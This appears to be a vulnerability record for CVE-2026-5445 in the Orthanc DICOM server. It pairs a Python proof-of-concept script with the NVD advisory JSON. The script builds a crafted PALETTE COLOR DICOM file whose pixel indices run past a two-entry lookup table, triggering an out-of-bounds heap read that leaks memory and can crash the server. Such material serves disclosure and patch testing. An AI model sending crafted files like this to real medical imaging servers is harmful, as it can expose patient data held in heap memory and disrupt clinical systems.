CVE-2026-5445

import pydicom import struct # Simulate creating a malicious DICOM file structure # This is a conceptual PoC to demonstrate the vulnerability trigger logic. # In a real scenario, one would need to craft a valid DICOM file with # specific tags that trigger the DecodeLookupTable path. def create_malicious_dicom(filename): # Create a minimal File Meta Information file_meta = pydicom.dataset.FileMetaDataset() file_meta.TransferSyntaxUID = '1.2.840.10008.1.2' # Implicit VR Little Endian file_meta.MediaStorageSOPClassUID = '1.2.840.10008.5.1.4.1.1.7' # Secondary Capture Image Storage file_meta.MediaStorageSOPInstanceUID = '1.2.3.4.5' file_meta.ImplementationClassUID = '1.2.3.4' # Create the Dataset ds = pydicom.dataset.Dataset(file_meta=file_meta) ds.SOPClassUID = '1.2.840.10008.5.1.4.1.1.7' ds.SOPInstanceUID = '1.2.3.4.5' # Set image attributes to trigger PALETTE COLOR decoding ds.SamplesPerPixel = 1 ds.PhotometricInterpretation = 'PALETTE COLOR' ds.BitsAllocated = 8 ds.BitsStored = 8 ds.HighBit = 7 ds.PixelRepresentation = 0 ds.Rows = 10 ds.Columns = 10 # Create a Palette with a small size (e.g., 2 colors) # Red, Green, Blue lookup tables ds.RedPaletteColorLookupTableDescriptor = b'\x00\x01\x10\x00\x00\x00' # 2 entries, 16 bits ds.GreenPaletteColorLookupTableDescriptor = b'\x00\x01\x10\x00\x00\x00' ds.BluePaletteColorLookupTableDescriptor = b'\x00\x01\x10\x00\x00\x00' # Dummy palette data ds.RedPaletteColorLookupTableData = b'\x00\x00\xFF\xFF' ds.GreenPaletteColorLookupTableData = b'\x00\x00\xFF\xFF' ds.BluePaletteColorLookupTableData = b'\x00\x00\xFF\xFF' # Pixel Data: Contains indices that exceed the palette size (e.g., 255) # The palette size is 2, so valid indices are 0 and 1. 255 is out of bounds. malicious_pixel_data = b'\xFF' * (10 * 10) ds.PixelData = malicious_pixel_data # Save the file ds.save_as(filename) print(f"Malicious DICOM file created: {filename}") if __name__ == "__main__": create_malicious_dicom('malicious.dcm') # When this file is processed by a vulnerable Orthanc Server instance, # it will attempt to access index 255 in a palette of size 2, # causing an out-of-bounds read.

{"cve": {"id": "CVE-2026-5445", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:16.863", "lastModified": "2026-04-14T20:10:01.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read vulnerability exists in the `DecodeLookupTable` function within `DicomImageDecoder.cpp`. The lookup-table decoding logic used for `PALETTE COLOR` images does not validate pixel indices against the lookup table size. Crafted images containing indices larger than the palette size cause the decoder to read beyond allocated lookup table memory and expose heap contents in the output image."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.11", "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"}]}]}], "references": [{"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}]}}